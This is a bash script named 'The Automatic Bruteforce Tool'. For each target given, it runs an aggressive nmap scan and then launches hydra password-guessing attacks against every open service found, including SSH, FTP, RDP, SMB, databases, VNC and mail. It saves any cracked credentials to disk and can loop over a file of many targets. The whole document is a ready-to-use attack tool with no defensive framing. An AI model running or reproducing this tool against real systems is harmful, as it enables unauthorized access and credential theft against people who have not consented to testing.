#!/bin/bash

splash() {
	clear
	echo -e "${red}"
        echo -e '      $$$$$$$$\ $$\   $$\ $$$$$$$$\  '
	echo -e '      \__$$  __|$$$\  $$ |\__$$  __| '
	echo -e '         $$ |   $$$$\ $$ |   $$ |    '
	echo -e '         $$ |   $$ $$\$$ |   $$ |    '
	echo -e '         $$ |   $$ \$$$$ |   $$ |    '
	echo -e '         $$ |   $$ |\$$$ |   $$ |    '
        echo -e '         $$ |   $$ | \$$ |   $$ |    '
	echo -e '         \__|   \__|  \__|   \__|    '
	echo -e "${default}  creator:n1x_ [MS-WEB] editor:LionKing"
	echo -e "${red}    The Automatic Bruteforce Tool\n ${default}"
}

report() {
	mkdir Scans Scans/${1} &> /dev/null
	mkdir Output Output/${1} &> /dev/null
}

port_scan() {
	echo -e "[${yellow}**${default}] Target: ${yellow} $1 ${default} Number of threads: ${yellow} ${thread} ${default}."
	echo -e "[${yellow}**${default}] Starting agressive scan of supported ports against: ${1} ...\n"
	sleep 1
	nmap -T4 -sS -Pn --open $1 -p 21,22,23,25,53,80,110,139,143,162,389,443,445,512,513,514,993,1433,1521,3306,3389,5432,5900,5901,6667,8000,8080 -oN Scans/${1}/$1.txt
	echo -e "[${yellow}**${default}] Scan finished."
	sleep 1
}

bruteforce() {
	if grep -q 21/tcp Scans/${1}/${1}.txt; then
		echo -e "[${yellow}**${default}] Port 21(FTP) is open. Starting bruteforce...\n"
		sleep 1
		hydra -L "dic/dic_username_ftp.txt" -P "dic/dic_password_ftp.txt" $1 ftp -e ns -o Output/${1}/ftp1_${1}.txt -I -t $thread
		finished_brute $1
	fi

        if grep -q 22/tcp Scans/${1}/${1}.txt; then
                echo -e "[${yellow}**${default}] Port 22(SSH) is open. Starting bruteforce...\n"
		sleep 1
                hydra -L "dic/dic_username_ssh.txt" -P "dic/dic_password_ssh.txt" $1 ssh -e ns -o Output/${1}/ssh_${1}.txt -I -t 16
                finished_brute $1
        fi

        if grep -q 23/tcp Scans/${1}/${1}.txt; then
                echo -e "[${yellow}**${default}] Port 23(Telnet) is open. Starting bruteforce...\n"
		sleep 1
		hydra -L "dic/dic_username_telnet.txt" -P "dic/dic_password_telnet.txt" $1 telnet -e ns -o Output/${1}/telnet_${1}.txt -I -t $thread
		finished_brute $1
        fi

        if grep -q 25/tcp Scans/${1}/${1}.txt; then
                echo -e "[${yellow}**${default}] Port 25(SMTP) is open. Starting bruteforce...\n"
		sleep 1
                hydra -L "dic/dic_username_smtp.txt" -P "dic/dic_password_smtp.txt" $1 smtp-enum -e ns -o Output/${1}/smtp-enum_${1}.txt -I -t $thread
                hydra -L "dic/dic_username_smtp.txt" -P "dic/dic_password_smtp.txt" $1 smtp -e ns -o Output/${1}/smtp_${1}.txt -I -t $thread
                finished_brute $1
        fi

        if grep -q 110/tcp Scans/${1}/${1}.txt; then
                echo -e "[${yellow}**${default}] Port 110(POP3) is open. Starting bruteforce...\n"
		sleep 1
		hydra -L "dic/dic_username_pop3.txt" -P "dic/dic_password_pop3.txt" $1 pop3 -e ns -o Output/${1}/pop3_${1}.txt -I -t $thread
                finished_brute $1
        fi
        
	if grep -q 143/tcp Scans/${1}/${1}.txt; then
                echo -e "[${yellow}**${default}] Port 143(IMAP) is open. Starting bruteforce...\n"
		sleep 1
		hydra -L "dic/Top20_Admin_Username.txt" -P "dic/Top100.txt" $1 imap -S 143 -e ns -o Output/${1}/imap_143_${1}.txt -I -t $thread
                finished_brute $1
        fi
	
        if grep -q 139/tcp Scans/${1}/${1}.txt; then
                echo -e "[${yellow}**${default}] Port 139(SMB) is open. Starting bruteforce...\n"
		sleep 1
		hydra -L "dic/dic_username_smb.txt" -P "dic/dic_password_smb.txt" $1 smb -S 139 -e ns -o Output/${1}/smb_139_${1}.txt -I -t $thread
                finished_brute $1
        fi

        if grep -q 162/tcp Scans/${1}/${1}.txt; then
                echo -e "[${yellow}**${default}] Port 162(SNMP) is open. Starting bruteforce..."
		sleep 1
		hydra -P "dic/Top100.txt" $1 snmp -S 162 -e ns -o Output/${1}/snmp_${1}.txt -I -t $thread
                finished_brute $1
        fi

        if grep -q 389/tcp Scans/${1}/${1}.txt; then
                echo -e "[${yellow}**${default}] Port 389(LDAP) is open. Starting bruteforce...\n"
		sleep 1
		hydra -L "dic/Top20_Admin_Username.txt" -P "dic/Top100.txt" $1 ldap2 -S 389 -e ns -o Output/${1}/ldap2_${1}.txt -I -t $thread
		hydra -L "dic/Top20_Admin_Username.txt" -P "dic/Top100.txt" $1 ldap3 -S 389 -e ns -o Output/${1}/ldap3_${1}.txt -I -t $thread
                finished_brute $1
        fi

        if grep -q 445/tcp Scans/${1}/${1}.txt; then
                echo -e "[${yellow}**${default}] Port 445(SMB) is open. Starting bruteforce...\n"
		sleep 1
		hydra -L "dic/dic_username_smb.txt" -P "dic/dic_password_smb.txt" $1 smb -S 445 -e ns -o Output/${1}/smb_445_${1}.txt -I -t $thread
                finished_brute $1
        fi

        if grep -q 512/tcp Scans/${1}/${1}.txt; then
                echo -e "[${yellow}**${default}] Port 512(rexec) is open. Starting bruteforce...\n"
		sleep 1
		hydra -L "dic/Top20_Admin_Username.txt" -P "dic/Top100.txt" $1 rexec -S 512 -e ns -o Output/${1}/rexec_${1}.txt -I -t $thread
                finished_brute $1
        fi

        if grep -q 513/tcp Scans/${1}/${1}.txt; then
                echo -e "[${yellow}**${default}] Port 513(rlogin) is open. Starting bruteforce...\n"
		sleep 1
		hydra -L "dic/Top20_Admin_Username.txt" -P "dic/Top100.txt" $1 rlogin -S 513 -e ns -o Output/${1}/rlogin_${1}.txt -I -t $thread
                finished_brute $1
        fi

        if grep -q 514/tcp Scans/${1}/${1}.txt; then
                echo -e "[${yellow}**${default}] Port 514(rsh) is open. Starting bruteforce...\n"
		sleep 1
		hydra -L "dic/Top20_Admin_Username.txt" -P "dic/Top100.txt" $1 rsh -S 514 -e ns -o Output/${1}/rsh_${1}.txt -I -t $thread
                finished_brute $1
        fi

        if grep -q 993/tcp Scans/${1}/${1}.txt; then
                echo -e "[${yellow}**${default}] Port 993(IMAP) is open. Starting bruteforce...\n"
		sleep 1
		hydra -L "dic/Top20_Admin_Username.txt" -P "dic/Top100.txt" $1 imap -S 993 -e ns -o Output/${1}/imap_993_${1}.txt -I -t $thread
                finished_brute $1
        fi

        if grep -q 1433/tcp Scans/${1}/${1}.txt; then
                echo -e "[${yellow}**${default}] Port 1433(mssql) is open. Starting bruteforce.../n"
		sleep 1
		hydra -L "dic/dic_username_sqlserver.txt" -P "dic/dic_password_sqlserver.txt" $1 mssql -S 1433 -e ns -o Output/${1}/mssql_${1}.txt -I -t $thread
                finished_brute $1
        fi

        if grep -q 1521/tcp Scans/${1}/${1}.txt; then
                echo -e "[${yellow}**${default}] Port 1521(oracle) is open. Starting bruteforce...\n"
		sleep 1
		hydra -L "dic/dic_username_oracle.txt" -P "dic/dic_password_oracle.txt" $1 oracle -S 1521 -e ns -o Output/${1}/oracle_${1}.txt -I -t $thread
                finished_brute $1
        fi

        if grep -q 3306/tcp Scans/${1}/${1}.txt; then
                echo -e "[${yellow}**${default}] Port 3306(mysql) is open. Starting bruteforce...\n"
		sleep 1
		hydra -L "dic/dic_username_mysql.txt" -P "dic/dic_password_mysql.txt" $1 mysql -e ns -o Output/${1}/mysql_${1}.txt -I -t $thread
                finished_brute $1
        fi

        if grep -q 3389/tcp Scans/${1}/${1}.txt; then
                echo -e "[${yellow}**${default}] Port 3389(RDP) is open. Starting bruteforce...\n"
		sleep 1
		hydra -L "dic/dic_username_rdp.txt" -P "dic/dic_password_rdp.txt" $1 rdp -e ns -o Output/${1}/rdp_${1}.txt -I -t $thread
		finished_brute $1
        fi

        if grep -q 5432/tcp Scans/${1}/${1}.txt; then
                echo -e "[${yellow}**${default}] Port 5432(postgres) is open. Starting bruteforce...\n"
		sleep 1
		hydra -L "dic/dic_username_postgresql.txt" -P "dic/dic_password_postgresql.txt" $1 postgres -e ns -o Output/${1}/postgres_${1}.txt -I -t $thread
		finished_brute $1
        fi

        if grep -q 5900/tcp Scans/${1}/${1}.txt; then
                echo -e "[${yellow}**${default}] Port 5900(VNC) is open. Starting bruteforce...\n"
		sleep 1
		hydra -L "dic/dic_username_vnc.txt" -P "dic/dic_password_vnc.txt" $1 vnc -S 5900 -e ns -o Output/${1}/vnc_5900_${1}.txt -I -t $thread
		finished_brute $1
        fi

        if grep -q 5901/tcp Scans/${1}/${1}.txt; then
                echo -e "[${yellow}**${default}] Port 5901(VNC) is open. Starting bruteforce...\n"
		sleep 1
		hydra -L "dic/dic_username_vnc.txt" -P "dic/dic_password_vnc.txt" $1 vnc -S 5901 -e ns -o Output/${1}/vnc_5901_${1}.txt -I -t $thread
		finished_brute $1
        fi

        if grep -q 6667/tcp Scans/${1}/${1}.txt; then
                echo -e "[${yellow}**${default}] Port 6667(IRC) is open. Starting bruteforce...\n"
		sleep 1
		hydra -L "dic/Top20_Admin_Username.txt" -P "dic/Top100.txt" $1 irc -s 6667 -e ns -o Output/${1}/irc_${1}.txt -I -t $thread
		finished_brute $1
        fi
}

finished_brute() {
                echo -e "[${green}**${default}] Bruteforce finished. Credentials found saved at: Output/${1}/."
                sleep 1
}

	red='\033[0;31m'
	green='\033[0;32m'
	yellow='\033[0;33m'
	default='\033[0;39m'

	UP="Wordlist/UaP.txt"
	oracle_up="Wordlist/oracle_up.txt"
	postgres_up="Wordlist/postgres_up.txt"

	thread="32"

	splash

        if [ $# -eq 0 ]; then
                echo -e "[${red}!!${default}] Error: No arguments supplied."
                echo -e "[${yellow}**${default}] Usage: ./TMT <target/file> <threads>"

		exit
	fi

	if [ ! -z "$2" ]; then
                thread=$2
        fi

	if [[ -f $1 ]]; then
		while IFS= read -r line
			do
				sleep 1
				report $line
				port_scan $line
				bruteforce $line $2
		done < "$1"
		exit
	fi

	sleep 1
	report $1
	port_scan $1
	bruteforce $1 $2

